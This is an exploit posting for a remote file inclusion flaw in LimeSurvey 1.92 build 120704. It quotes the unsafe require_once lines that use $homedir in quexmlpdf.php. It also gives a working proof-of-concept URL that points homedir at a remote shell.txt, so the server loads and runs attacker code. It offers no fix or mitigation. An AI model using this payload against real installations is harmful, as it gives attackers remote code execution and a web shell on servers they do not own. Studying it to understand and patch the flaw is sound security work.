##################################################################################
### Exploit Title: LimeSurvey 1.92 + build 120704 Remote File Inclusion Vulnerability
### Date: Who cares !
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### Vendor Homepage: http://www.limesurvey.org/
### Software Link: http://download.limesurvey.org/Latest_stable_release/limesurvey192plus-build120704.7z
### Version: 1.92 + build 120704 ( I Don't check old version )
### Tested on: Linux/Windows
#################################################################################
# File ( /admin/classes/quexml/quexmlpdf.php ) in line 7 & 8 :
require_once($homedir .'/classes/tcpdf/config/lang/eng.php');
require_once($homedir .'/classes/tcpdf/tcpdf.php');
# Example:
http://127.0.0.1/limesurvey/admin/classes/quexml/quexmlpdf.php?homedir=http://127.0.0.1/shell.txt?
# Greetz to my friendz